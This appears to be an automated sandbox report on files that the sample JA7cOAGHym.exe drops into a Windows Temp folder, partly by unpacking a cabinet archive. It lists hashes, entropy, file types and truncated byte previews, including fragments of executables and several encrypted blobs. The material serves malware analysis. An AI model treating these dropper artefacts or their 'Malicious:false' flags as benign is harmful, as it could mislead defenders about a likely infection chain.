                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<.<.<.=.=.=.="=&=,=6=@=J=U=]=a=g=k=q={=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>$>,>0>6>:>@>J>T>^>i>q>u>{>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.?#?-?8?@?D?J?N?T?^?h?r?}?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.`..4....0.0.0.0.0#0-070A0L0T0X0^0b0h0r0|0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.1#1'1-11171A1K1U1`1h1l1r1v1|1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2$2/272;2A2E2K2U2_2i2t2|2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3$3.383C3K3O3U3Y3_3i3s3}3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.4.4$4(4.484B4L4W4_4c4i4m4s4}4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.5.5.5&5.52585<5B5L5V5`5k5s5w5}5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6%6/6:6B6F6L6P6V6`6j6t6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7.7%7/797C7N7V7Z7`7d7j7t7~7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8%8)8/83898C8M8W8b8j8n8t8x8~8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9.9&91999=9C9G9M9W9a9k9v9~9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:.:.:&:0:::E:M:Q:W:[:a:k:u:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.; ;&;*;0;:;D;N;Y;a;e;k;o;u;.;.;.;.;.;.;.;.;.;.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Fusion

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72704
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.946134766246351
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:G/mwftIQXoSpu88888888888888888888888888888zv888888NfU84444QnoooD:G/mex/SGKY
                                                                                                                                                                                                                                                                                    MD5:B52D4A59CC65776F74415CB844E98FEC
                                                                                                                                                                                                                                                                                    SHA1:AA4032DF4DA4DC4F5955EE0E48079B27B64329EB
                                                                                                                                                                                                                                                                                    SHA-256:7712DFE325D7D5E5CCB0CB494C17F2A5576BB4B733AF11352589AEFE398D4EEB
                                                                                                                                                                                                                                                                                    SHA-512:AC8A8F07192910BF11CB76B9A7F9D61294B284CB8B8E999F605B73FF6EB4B1A66D69E41B2AC2E8A1F10576D6162803312E0F34CC4DB655F97A682D8D4EF201ED
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.m.m.m.m.m.m.m.m.m.m.....................................................m...........................................................................................................................................................................................................................................................................................................................r.........................................................................................................................r.r...........................................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.......................................................................................................................r.r.r.r.r.............................................................................................r.r............................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Investigator

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:SoftQuad troff Context intermediate
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):110592
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.329085679036274
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:fj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdj:r6whxjgarB/5elDWy4ZNoGmx
                                                                                                                                                                                                                                                                                    MD5:4367D8625C460A6D48A54DCF9F27927E
                                                                                                                                                                                                                                                                                    SHA1:F34AF7B1C78512FEDD875123167EEF8B3E64B744
                                                                                                                                                                                                                                                                                    SHA-256:466C90B657A6D1C36E66A0A690BE542BFF3322914D028957509E89B2FA2E9660
                                                                                                                                                                                                                                                                                    SHA-512:DBF7BCDBF2F05EF791DF1AB3024E6F336F611DAEB81E07F6C1A81AFD70D1FB1B03A7B8E2F05ED2D2F9A3E9270A9590BD1B3DF85AE02325B83049BAD34E97D5BB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:X has not been compiled.malformed \P or \p sequence.unknown property name after \P or \p.subpattern name is too long (maximum 32 characters).too many named subpatterns (maximum 10000).repeated subpattern is too long.octal value is greater than \377 in 8-bit non-UTF-8 mode.internal error: overran compiling workspace.internal error: previously-checked referenced subpattern not found.DEFINE group contains more than one branch.repeating a DEFINE group is not allowed.inconsistent NEWLINE options.\g is not followed by a braced, angle-bracketed, or quoted name/number or by a plain number.a numbered reference must not be zero.an argument is not allowed for (*ACCEPT), (*FAIL), or (*COMMIT).(*VERB) not recognized or malformed.number is too big.subpattern name expected.digit expected after (?+.] is an invalid data character in JavaScript compatibility mode.different names for subpatterns of the same number are not allowed.(*MARK) must have an argument.this version of PCRE is not compiled with Uni

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Involve

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):81920
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997778612174641
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:1536:Epw2OgleR8WrgdkgbNnED5YUAZoAQkX1vQmMkUb33pot39pESAw7IBow1:EpqGTP5nED6XZoAQkX99Ub3Gt3Y1wMOI
                                                                                                                                                                                                                                                                                    MD5:94FBF53BED71838B7F036C99A69A04F8
                                                                                                                                                                                                                                                                                    SHA1:57FF8BE476332DD6E30A150219CDDA4CEFF5A73D
                                                                                                                                                                                                                                                                                    SHA-256:D22467276506B5A4EE8A389FE40ADC923405AEDEA955C400F7A08D29384B64C8
                                                                                                                                                                                                                                                                                    SHA-512:1972445C9E1FBE966A37D792047EA6DAEF18C503C03006E8EE1F75DABE33C504F85A571217982EE67FC571F8FC8D204BAA8A0C12B240D503605EA79A9471BA65
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:y.V....%.V..2.8~y'3.7....WJ..T!.J.....(../.?....&.../@B..r.:.I...b2.+....F.Kfao..b.%....D\@}..&.w?....5...9RI...>;v...Xt..{..."...0..g......../.K..n.|[..L*X......~&c....9.H.[..D3..N.I.^<.5YF4l3........BF.'.n.'.|.c.0...5......q(R..J....H......./cqj...3bw..6F...1..5%Op...V.K..zB.........(......r.>!.;D....t.(..u.....}~Q..?f.lk..H....B.5..\....%.)...^....Dy:.........h...."7.t9A5B}tX....6.f.;.T......6..$..q..@..h....5..j..O...-&...u3..X.%..~....,.{.R.....9...[....ES=c<.......xW....#.. .G../."7.r.......H..Z...|.s..$j..Gr`1e..0....y.U...9..3VU.W...Ykn&..Z....*....Q..VXL0.....,.H...[..}h....X].xa.~..b:..>..?.t........J#]9W.%k..n..x;d.;s,.._. .Z7j..1.>...e}a.*.. .&a^..$dh..6..41........s..N.65.S....i.@. ..9.M.-..P....|...e1..y7#(....&..... J...]p.s.~vf7......z...t=-\..........n...e=.....3....q./.&~.v.....2.)..Z.....E `...[.].r.U.H1....vka4."t..b.......-.B%.....(.iYL.......S. .%B.....-3F.05L...5.v..P....F........?vx.^.n^O.k6O.....&..L..?/.t.L$..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Iso

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):90112
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.9983692819957195
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:1536:lJPTkT0knmD3ZqDTAmJHRCjRGPK/NtSejbU4AC0SwZZECmYLZunQb+DvzYZH:cT0kMpsAmJHwoeJPU4B0zo+qzOH
                                                                                                                                                                                                                                                                                    MD5:044F5330FF060782BE410405981407C6
                                                                                                                                                                                                                                                                                    SHA1:24EA2F21BA08424C7EFACA1CE01BD7F4D804BD16
                                                                                                                                                                                                                                                                                    SHA-256:B349DB72FC848120D656FB74371BDCCE34BCBA0D501C5A2E594E86BC938E7BD3
                                                                                                                                                                                                                                                                                    SHA-512:3E99EBBFF921871367802A9AB7A400D2366104E7985F98FE50B76ACAB8D88EBCE59C4C8A7FE87298B65D4C31088FA917841D5789A30C94E8E3AD522BAFC45605
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.E..v...~..@..yP..& .&...2....a!S.h4.~b .U......^)F.s.&|r+.=..o..N.l..38'R."..l.}#.\...7.....8P:1.>..Q.W..........g..p...)#...3.c..t...G`.bm!....P.a..k....)>..8.5.. .&.xF.;E...l..-H.7B]...XR..z|.-ja.Wx'...M.3.;...C...:..$..Sg.....+.E....&.S.F./....(._hL...:3....p.|.e..K7.r..;..=8u...Nfaj.+...b..l......w._...A(.7$K\....I#6.K.....M.......|.^"...Y.1B...<}BS.f%...-..F~......@.X.....M.;.$/U...0.._-T.......y@mu......v..q..w..!<rjK..n.mxk..c..y.4P.....b.nY..e..7....}............5.vH.&J...?.y.$...z..g..$..(...D...`.......p.......V..x.......[.J.!.Z...x`....gk.Rs.....H.........9..7Kt;..9>..8L;..6.=E..3.;......gD....)F&..TE.h..>.$....n...}>J.S2.v.:...5.F;e..,6s..js...s".T...XUHWIF..y.o.....?.>.y..;.R.....A.J.xJ@Mw.r>......d.];.....a......J..n..!.C....z.....yxd.6..(..VX2..;.......J.}..v..._,../vyb..:...f..X..:....m..l...........Y....]@....!6..l.K;V...a..f.Y....:s..dR[.giT...1#\=... ..~.CJLd-.7....g..Q.....=0 ......b.~.*..tH..Y.}-./...........

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Leo

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):76800
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997909761032615
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:1536:aJqo9SOA43j0qycQ/rSKebxT2aW7DS4GWVvTtmNFKBMbkLnk:aJq2z0L/rS9K/S2VaKBMqk
                                                                                                                                                                                                                                                                                    MD5:1E6B1CE5757D63BF5C1135F508D6B581
                                                                                                                                                                                                                                                                                    SHA1:00D591AA90AF2DDB27731C4250583B63C778A057
                                                                                                                                                                                                                                                                                    SHA-256:5996A92CD25C465C82472DC4301015C128B1FD90A062005098D75D2A028AE5E6
                                                                                                                                                                                                                                                                                    SHA-512:8E41105A2DD0ACFECFE713D129ECB193CCB02778DCF07D23C0623DB2348A84139613836AC2C0C9676DAEBFA131ECBDC4F23D6A44A9929154C99FB6C7DE08D349
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:9.3...\..]...C d^$...........F.....N2.w3.}..!.......tF..Y8L\R2P..70....oK.l.,+..6.].....QY...C)......z.i.}`.GV..T\o)..K.k.....d9Z.?V....^..>.K..y....z[o'..r4tf..R".o.`W...#".A..9..(..=.S.._.={8.K.I..)=^?.a.........!.Q.~0..+a>..K...U.....w..MY..;...U..MO.nc..._r.7....v../...eR.._.6F....y.]P..v..J|.87?.Ln.7........O.$....b...T..A..Q.W.`..<...i..e.'...3<..y.......M............ai..p..x........aya.U.8n..wR.p_.z....\........az{a....:...u.z.&btWae..UA.PI.T.J.<]..Q.+s.G.....|.#qDG..M`..$-.....e..'.I.........x,.....PV..tz..b..............+..,C....2..o.s...m.<.4.T.l.r{.eV...oh~.........)..S.;...........A.p..xV......W.O.$..E...;..r..f.r..k.o....L......1Yq2.D....H...[..).Y......]..........F.......=...-....c.4)l.`...9.6..G.Nr> ./gz..J0/CI.A~^.D...m.E......df.......'U..l4.......N..9..n.A.i.H@..".2...Y....\.....V.|/.Q.".@.....u..w|t7.0.K`..l.KA......W1.kX.z..d.n...{..:.h.M......1..]............9T._.....~.....Rf..p...-. ...1>.....E..R@"...]`m1........v%~...&.n

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Modem

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72704
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.591102673995394
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:ai8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/s0:10Imbi80PtCZEMnVIPPBxT/s0
                                                                                                                                                                                                                                                                                    MD5:7EB8A7B1DCF555CBF3505D13E6386C5D
                                                                                                                                                                                                                                                                                    SHA1:AE36FFFBCDA8AAE412B0AA09C67DC9AE937C991A
                                                                                                                                                                                                                                                                                    SHA-256:D2B540058D7831277BC84C13F28EEBEDE379575C30AF5C5AE071D15A27BE01AD
                                                                                                                                                                                                                                                                                    SHA-512:41D8F919AA7D5145A8ED059022C704FB6F1CCFBFA33670561385E4148C74D1A0797A34FDF309A6FE5F2082041A1F9C1B557C571B7FE6F5B34CA25CEF90987703
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.Z..Y_..^[..]..t.3...j.j...}..S...M..kZ...5..M......t.9...M.u%j.j...}..S...M..BZ.....9...M.t..5..M...t..E..+.PQ......E.YY..xH9.tD.4...Z..Y.M.8].u..E.........D.....A9..u.j.QV.HX..S....Y........tX.P8].........E..H.;............?......j.QV..X..S...Y..............M....E.....\...5..M.9].........Q...A..u.+.j..A.P.E...|....YY..tG.u..u.V.aX.......u@.M..+E.A....E.......Y.#.PV....I...u...".......*...V..X..Y.a...SSSSS."W....U..QW.}...u.3.....3..9.t..@.A.8.u.V.A.j.P.s{....YY..te.?.tPS..+...Q...A..u.+.j..A.P.E..E{..j...;.X......<;.t,.7.u..4;.W.......u....9.u.[j..WX..Y..^_..]..(W..3.PPPPP.qV....U..SVW.=..M....?.t*.].S.6.u..P>.......u......<=t...t.....>.u.+......_..^[].+.......U..]......t.I.....#M.....%.#M......U..Q...L.3.E.W.}.;}.u....WV..S....t.......I....t....;u.u.;u.u....,;.t&....~..t.....t.j.......I...Y....F.;.u.2.[^.M.3._..8....]..U..Q...L.3.E.V.u.9u.t#...W.>..t.j.......I...Y....F.;E.u._.M...3.^.7....].j.h.L..N7...e...E..0.q\..Y.e...5..L.....35.#M...u..E.............X

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Offering

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1702
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.738920378932054
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:VyGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhB4+Jvd:m9n9mTsCNvEQH5O5U1nPKrhBzF
                                                                                                                                                                                                                                                                                    MD5:265DB1C7E2990F9FFA3B5AE465863214
                                                                                                                                                                                                                                                                                    SHA1:B1E49C5ECFF9979CF4CFE3F8B37FA6FF5F219EDE
                                                                                                                                                                                                                                                                                    SHA-256:7CAD121427D03FC5848BD8B78EA7D9DFACB8C3B0D554C7F953F52F2163714920
                                                                                                                                                                                                                                                                                    SHA-512:142B3E32F2514B0633EE727082FE5B40971AFA5161E3FAEE9965052D80A730ADB01D52F67CBBF6AE6256F5C9635E6EF0D05B136C281A5688CFA602F370D8CE4E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SAO........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.............................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Power

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):117760
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.0718564446790815
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:Re6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtt:R314V14ZgP0JaAOz04phdT
                                                                                                                                                                                                                                                                                    MD5:052B141A15B4DD50165BBFDC9947EC38
                                                                                                                                                                                                                                                                                    SHA1:11527DAB56ACC5CEE04F913DECB0D16C94641106
                                                                                                                                                                                                                                                                                    SHA-256:0FBA6AE390225C1F5F200B98643AD78B297DD1427727539AEC7055A2C60A614F
                                                                                                                                                                                                                                                                                    SHA-512:8EC8D302526C52AAE4EAE075E5FE7BE164C9FD2F71DFE8CA0E148FB78B426D280C2DA4739DB3AF96AC2C66BF3A591E4DBD87C41683884F1F4A9F1861511F77C6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:h?....s4...........H.I..........i....E.3...(...G............P.......Ph=...........H.I...../.................E.WV.0..X.I......h.....P...Y...P...0.....P....T.......PV.u...t....s..x...........I...tA..X.......u5.E...t.....P...PV.u..s.....I...t..E..0..`.I.W....Y.7W....Y.z...9u.u.....o....u.W..$.I.....[....E.j.SP.$..3.@.I......_I..`I..`I..cI.R`I..bI.!cI..bI.s`I..`I..aI..`I..cI..............................U.....M.VW.u...N...E.P.E.P.u...\...........M..@)M.....M..0.T)M.......E........uy.E.....L.......Dz..F|.......L..>...S.]..E....u........}..u........E..}..u..Fl.M.;.t.P..Y..3..E.GW.u..u.S.u.P.u.V....[..3..M..X...._^....U......SVW.M..`d...E.E.P.E.P.u...[..3.....\....M..@)M.....M....E.T)M.....M.........3.u.U.....E.3....@..............X............+................P.E.PW.u..u.....I..........E.......P.E..V.....T)M..E.......q@..u?3.@PPj!j.j.....I...T)M....E.VW.}....h....W...q@..H.I............}..u........PV....I...........E..E.....PQh=...W.u...H.I.f...............E...P.y.......u.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Ti

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):142336
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.71205536008383
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:0W2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAU4C2:uUDtf0accB3gBmmLsiS+SAhC2
                                                                                                                                                                                                                                                                                    MD5:D0B70806A9A080BCBDFFBC134CC25562
                                                                                                                                                                                                                                                                                    SHA1:2A3B28FF0C7B8531F819BA358E505C71F0875133
                                                                                                                                                                                                                                                                                    SHA-256:FC0679E63BC43D6D6924F6AC0EFAEFFB0CDF0955100429C884AAE991936AC39C
                                                                                                                                                                                                                                                                                    SHA-512:6DC1FCF5F73B8460036550269FE83E8D737E5A17A852D0957BB60A16CB2293C6C79D7756D4672194D13E2C2727FDE4E6412C479D42570837BC56E28FC11B5A5E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:v.....................E.j*.@..p............uu.~..............N.j.^...D$0.A..D$4.A..D$8.A..D$<...D$0.d$...L$ ;.t.P......t..L$0.q....|$....l....D$ ..P.'.......f....E..@..0...k....F..L$0.0......D$.P.D$.P.D$.P.D$.P.D$$P.D$DP.f.....L$0..............L....T$..L$..T$......z....|$.........D$..........|$.........|$..........3............L$..D$.....r...........3........j(.3Y....Y.N..P....N..H...;\$........D$..t$.P........j.........L$....................H.............D$ ...;.t.P.U....E..@..0...-.................;N.t..v..+.............t$..L$.Q...0.5.#M.....I.....J....L$ ...._^3.[..]...U.....U.3.S3.E.V3.CW.u.9B........M.3.}..E.#......M....}....M....M...P...8...j+Yj^...f;.Yj!Z.. ...f;.......f;.......f;E........F...V.E.......u.}......{......j@.M..?....U..E.P.E.Pj}X...\...YY..tN.u..4..!K.....YY..t.F..c|..c........H!K..u!.... K....M............_^[....2...2...U..QSVWf...U..M..;....u.2.6.M.V.G......f..t#..u.f;.t..M.P......E..0F.0..E.......f..t..._^[..U..U...<...V.........B..F..B..F..B..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Va

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):103424
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.255236945108948
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:lZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3lx:lK5vPeDkjGgQaE/lx
                                                                                                                                                                                                                                                                                    MD5:5D30E8BA9C3DE161DC1C927CE83069D3
                                                                                                                                                                                                                                                                                    SHA1:B376D8705C597FFD16D3083F39492D945F2E26A4
                                                                                                                                                                                                                                                                                    SHA-256:E39DFA1CCF160EA83D3D9957E66B32B2817CAD27116070571A8A9189A4DE2888
                                                                                                                                                                                                                                                                                    SHA-512:4508FCF39BDCB26B2ED25DFD67D53C3BD5783907D78E1FB123E31B570112D30F561684DC73F280A40E643EEF5BBBF56B68630A5CF3DBB3DC2F88B54992D994AC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Validation

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, 489707 bytes, 11 files, at 0x2c +A "Widescreen" +A "Automatically", ID 7745, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):489707
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.99877735006721
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:XO+IOSpdBKVprs/hh6eZ3hbTEeIchSN+2h6TEC3qqXfll:X6npWpI/bzvE+hSPh6YkqqX9l
                                                                                                                                                                                                                                                                                    MD5:68D6786EBC1AB8EBB3887894A4403252
                                                                                                                                                                                                                                                                                    SHA1:B47893B4B518BF1512CF0AF8BA62F3F24FF215F0
                                                                                                                                                                                                                                                                                    SHA-256:37B24182C21259FA5926A38C114A3CBCB2372D0116B11A906C728928E6DCCF8D
                                                                                                                                                                                                                                                                                    SHA-512:0B9B9D47C3FAF6EB54B0A6D9671A46240AD645B4C0EE9E05292DFF6801AFEED78E8D0F41CBDBD63B53CB3016F82762EDE6431F3733480EAB3644F1FFD1E1628E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MSCF.....x......,...............A...2..................Y;t .Widescreen............Y;t .Automatically......\.....Y;t .Fusion......x.....Y;t .Cars............Y;t .Modem............Y;t .Assisted......1.....Y;t .Va..,.........Y;t .Ti............Y;t .Investigator............Y;t .Power......m.....Y;t .Offering.d....C..CK.}.|SU...%@ .S.P.@T..B......-B!...P..b.F...nZ......\.UW..O.*.P...A.....=5U.M.m..f.............9s...y..Ey........;.Z<Ez...?o...;.I..9|.}-JB.0.|M-....N,f..b..(.A.S....H...T2#V2..E..g.M....R...m...o...=I.~!.U........K.....T_S...xW.....5...YH.M5.P..b5.B.Vx7.....cD..l..-..K....SII...q%.B..c..r .J..{.....0x.....b.X.4.D..+P...jLQ....f..l.A.[D.S1.(V.qg..!>9.4a....K..dU..e...L....wY....[d'.........2BG8.2..Q.7...|..o)c..7_r(..gY.}..fz...._@5.fNM...5...H........H,...=...Y..&.S<..a.L.:..."... L..U.>.......P.?.d./O3.jZ~V.vZv....F.....okSf..0.1.._7.W.....A...Xu/./..|CV..g..g......l.dsM....n.1.`..a.l.=s..6H3Y..9.....%l...6..7A..[M......._.....m4..7.}.R..V..i

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Viewpicture

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40971
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.995401646285635
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:768:Ej8NM4OPjfM4GIqWFmiWWBsTGyQoo22WLdDZl2RGlByXgLHo+DwxSHOrdDiAz3wx:EgG4KvIRTG10XV25XgL1DESurwL9
                                                                                                                                                                                                                                                                                    MD5:14FBF99EB9C4DBA9ADFBB8A60DC0CD8B
                                                                                                                                                                                                                                                                                    SHA1:20DDE7F153055A00C38B1007AFACFDD0D1C9BC67
                                                                                                                                                                                                                                                                                    SHA-256:85250A753B5C0B51ED49D72F0788A3199CFB45B01DCBDFF3ECD918BAF6CCB8BE
                                                                                                                                                                                                                                                                                    SHA-512:2EA7998355B738E9027A0EEA789443EA1263C897F113E1B19BA19D7944659FB6C17DB2AAC967E8EAB828F5936C81FA60F4C00D0685761484E5C78D4E56B65E8F
                                                                                                                                                                                                                                                                                    Malicious:false
